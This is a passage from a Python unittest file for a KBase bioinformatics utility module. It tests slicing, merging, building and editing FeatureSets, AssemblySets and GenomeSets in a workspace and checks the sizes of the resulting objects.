\\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_sliced_features)\n pass\n\n #### test_KButil_Logical_Slice_Two_FeatureSets_NULL_RESULT():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_FeatureSets_NULL_RESULT()\") # uncomment to skip\n def test_KButil_Logical_Slice_Two_FeatureSets_NULL_RESULT(self):\n method = 'KButil_Logical_Slice_Two_FeatureSets_NULL_RESULT'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # featureSet 2\n featureSet_obj_2 = {'description': 'test featureSet 2',\n 'element_ordering': [\n feature_id_2,\n feature_id_3\n ],\n 'elements': {\n feature_id_2: [genome_ref_2],\n feature_id_3: [genome_ref_3]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_2,\n 'name': 'test_featureSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_2 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n num_sliced_features = 0 # yesA_yesB\n logical_operator = 'yesA_yesB'\n base_output_name = 'Slice_output_' + logical_operator + 'NULL_RESULT'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_featureSet_ref_A': featureSet_ref_1,\n 'input_featureSet_ref_B': featureSet_ref_2,\n 'operator': logical_operator,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Logical_Slice_Two_FeatureSets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n # output_name = base_output_name\n # output_type = 'KBaseCollections.FeatureSet'\n # output_ref = self.getWsName()+'/'+output_name\n # info_list = self.getWsClient().get_object_info_new({'objects':[{'ref':output_ref}]})\n # self.assertEqual(len(info_list),1)\n # output_info = info_list[0]\n # self.assertEqual(output_info[1],output_name)\n # self.assertEqual(output_info[2].split('-')[0],output_type)\n # output_obj = self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n # self.assertEqual(len(output_obj['element_ordering']),num_sliced_features)\n pass\n\n \n #### test_KButil_Logical_Slice_Two_AssemblySets_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_AssemblySets_01()\") # uncomment to skip\n def test_KButil_Logical_Slice_Two_AssemblySets_01(self):\n method = 'KButil_Logical_Slice_Two_AssemblySets_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n try:\n auClient = AssemblyUtil(self.callbackURL, token=self.token)\n except Exception as e:\n raise ValueError(\n 'Unable to instantiate auClient with callbackURL: ' + self.callbackURL + ' ERROR: ' + str(\n e))\n ass_file_1 = 'assembly_1.fa'\n ass_file_2 = 'assembly_2.fa'\n ass_path_1 = os.path.join(self.scratch, ass_file_1)\n ass_path_2 = os.path.join(self.scratch, ass_file_2)\n shutil.copy(os.path.join(\"data\", ass_file_1), ass_path_1)\n shutil.copy(os.path.join(\"data\", ass_file_2), ass_path_2)\n ass_ref_1 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_1},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_1'\n })\n ass_ref_2 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_2},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_2'\n })\n ass_ref_3 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_2},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_3'\n })\n\n # save assemblySets\n try:\n setAPI_Client = SetAPI (url=self.serviceWizardURL, token=self.ctx['token']) # for dynamic service\n except Exception as e:\n raise ValueError('ERROR: unable to instantiate SetAPI' + str(e))\n set_1_items = [{'ref':ass_ref_1, 'label': 'assembly 1'},\n {'ref':ass_ref_2, 'label': 'assembly 2'}]\n set_2_items = [{'ref':ass_ref_2, 'label': 'assembly 2'},\n {'ref':ass_ref_3, 'label': 'assembly 3'}]\n set_1_desc = 'test set'+'_1'\n set_2_desc = 'test set'+'_2'\n set_1_obj = { 'description': set_1_desc,\n 'items': set_1_items\n }\n set_2_obj = { 'description': set_2_desc,\n 'items': set_2_items\n }\n set_1_obj_name = 'set_1.AssemblySet'\n set_2_obj_name = 'set_2.AssemblySet'\n try:\n set_1_ref = setAPI_Client.save_assembly_set_v1 ({'workspace_name': self.getWsName(),\n 'output_object_name': set_1_obj_name,\n 'data': set_1_obj\n })['set_ref']\n set_2_ref = setAPI_Client.save_assembly_set_v1 ({'workspace_name': self.getWsName(),\n 'output_object_name': set_2_obj_name,\n 'data': set_2_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save assembly set object to workspace: (' + self.getWsName()+\")\\n\" + str(e))\n \n # run method\n num_sliced_items = 1 # yesA_yesB\n #num_sliced_items = 1 # yesA_noB\n #num_sliced_items = 1 # noA_yesB\n logical_operator = 'yesA_yesB'\n #logical_operator = 'yesA_noB'\n #logical_operator = 'noA_yesB'\n base_output_name = 'logical_slice_assemblysets_output_' + logical_operator\n params = {\n 'workspace_name': self.getWsName(),\n 'input_assemblySet_ref_A': set_1_ref,\n 'input_assemblySet_ref_B': set_2_ref,\n 'operator': logical_operator,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Logical_Slice_Two_AssemblySets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSets.AssemblySet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), num_sliced_items)\n pass\n\n\n #### test_KButil_Logical_Slice_Two_GenomeSets_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_GenomeSets_01()\") # uncomment to skip\n def test_KButil_Logical_Slice_Two_GenomeSets_01(self):\n method = 'KButil_Logical_Slice_Two_GenomeSets_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n\n # GenomeSet 1\n genomeSet_obj_1 = {'description': 'test genomeSet 1',\n 'elements': {'genome_0a': {'ref': genome_ref_0},\n 'genome_1a': {'ref': genome_ref_1},\n 'genome_2a': {'ref': genome_ref_2},\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_1,\n 'name': 'test_genomeSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n set_1_ref = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n\n # GenomeSet 2\n genomeSet_obj_2 = {'description': 'test genomeSet 2',\n 'elements': {'genome_1b': {'ref': genome_ref_1},\n 'genome_2b': {'ref': genome_ref_2},\n 'genome_3b': {'ref': genome_ref_3}\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_2,\n 'name': 'test_genomeSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n set_2_ref = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n \n # run method\n num_sliced_elements = 2 # yesA_yesB\n logical_operator = 'yesA_yesB'\n base_output_name = 'logical_slice_genomesets_output_' + logical_operator\n params = {\n 'workspace_name': self.getWsName(),\n 'input_genomeSet_ref_A': set_1_ref,\n 'input_genomeSet_ref_B': set_2_ref,\n 'operator': logical_operator,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Logical_Slice_Two_GenomeSets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_sliced_elements)\n pass\n\n\n #### test_KButil_Merge_GenomeSets_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Merge_GenomeSets_01()\") # uncomment to skip\n def test_KButil_Merge_GenomeSets_01(self):\n method = 'KButil_Merge_GenomeSets_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_merged_genomes = 4\n\n # GenomeSet 1\n genomeSet_obj_1 = {'description': 'test genomeSet 1',\n 'elements': {'genome_0': {'ref': genome_ref_0},\n 'genome_1': {'ref': genome_ref_1}\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_1,\n 'name': 'test_genomeSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n genomeSet_ref_1 = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n\n # GenomeSet 2\n genomeSet_obj_2 = {'description': 'test genomeSet 2',\n 'elements': {'genome_2': {'ref': genome_ref_2},\n 'genome_3': {'ref': genome_ref_3}\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_2,\n 'name': 'test_genomeSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n genomeSet_ref_2 = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': [genomeSet_ref_1, genomeSet_ref_2],\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Merge_GenomeSets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_merged_genomes)\n pass\n\n #### test_KButil_Build_GenomeSet_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Build_GenomeSet_01()\") # uncomment to skip\n def test_KButil_Build_GenomeSet_01(self):\n method = 'KButil_Build_GenomeSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_genomes = 4\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': [genome_ref_0, genome_ref_1, genome_ref_2, genome_ref_3],\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Build_GenomeSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_genomes)\n pass\n\n #### test_KButil_Build_GenomeSet_from_FeatureSet_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Build_GenomeSet_from_FeatureSet_01()\") # uncomment to skip\n def test_KButil_Build_GenomeSet_from_FeatureSet_01(self):\n method = 'KButil_Build_GenomeSet_from_FeatureSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_genomes = 4\n\n # featureSet\n featureSet_obj = {'description': 'test featureSet',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2,\n feature_id_3\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2],\n feature_id_3: [genome_ref_3]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj,\n 'name': 'test_featureSet',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_ref': featureSet_ref,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Build_GenomeSet_from_FeatureSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_genomes)\n pass\n\n #### test_KButil_Add_Genomes_to_GenomeSet_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Add_Genomes_to_GenomeSet_01()\") # uncomment to skip\n def test_KButil_Add_Genomes_to_GenomeSet_01(self):\n method = 'KButil_Add_Genomes_to_GenomeSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_merged_genomes = 4\n\n # GenomeSet 1\n genomeSet_obj_1 = {'description': 'test genomeSet 1',\n 'elements': {'genome_1': {'ref': genome_ref_0}\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_1,\n 'name': 'test_genomeSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n genomeSet_ref_1 = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_genome_refs': [genome_ref_1, genome_ref_2, genome_ref_3],\n 'input_genomeset_ref': genomeSet_ref_1,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Add_Genomes_to_GenomeSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_merged_genomes)\n pass\n\n #### test_KButil_Add_Genomes_to_GenomeSet_02():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Add_Genomes_to_GenomeSet_02()\") # uncomment to skip\n def test_KButil_Add_Genomes_to_GenomeSet_02(self):\n method = 'KButil_Add_Genomes_to_GenomeSet_02'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_merged_genomes = 4\n\n # GenomeSet 1\n genomeSet_obj_1 = {'description': 'test genomeSet 1',\n 'elements': {'genome_0': {'ref': genome_ref_0}\n }\n }\n # GenomeSet 2\n genomeSet_obj_2 = {'description': 'test genomeSet 2',\n 'elements': {'genome_1': {'ref': genome_ref_1},\n 'genome_2': {'ref': genome_ref_2},\n }\n }\n provenance = [{}]\n genomeSet_1_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_1,\n 'name': 'test_genomeSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n genomeSet_ref_1 = str(genomeSet_1_info[WSID_I]) + '/' + str(\n genomeSet_1_info[OBJID_I]) + '/' + str(genomeSet_1_info[VERSION_I])\n\n genomeSet_2_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_2,\n 'name': 'test_genomeSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n genomeSet_ref_2 = str(genomeSet_2_info[WSID_I]) + '/' + str(\n genomeSet_2_info[OBJID_I]) + '/' + str(genomeSet_2_info[VERSION_I])\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_genome_refs': [genomeSet_ref_2, genome_ref_3],\n 'input_genomeset_ref': genomeSet_ref_1,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Add_Genomes_to_GenomeSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_merged_genomes)\n pass\n\n #### test_KButil_Remove_Genomes_from_GenomeSet_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Add_Genomes_to_GenomeSet_01()\") # uncomment to skip\n def test_KButil_Remove_Genomes_from_GenomeSet_01(self):\n method = 'KButil_Remove_Genomes_from_GenomeSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP 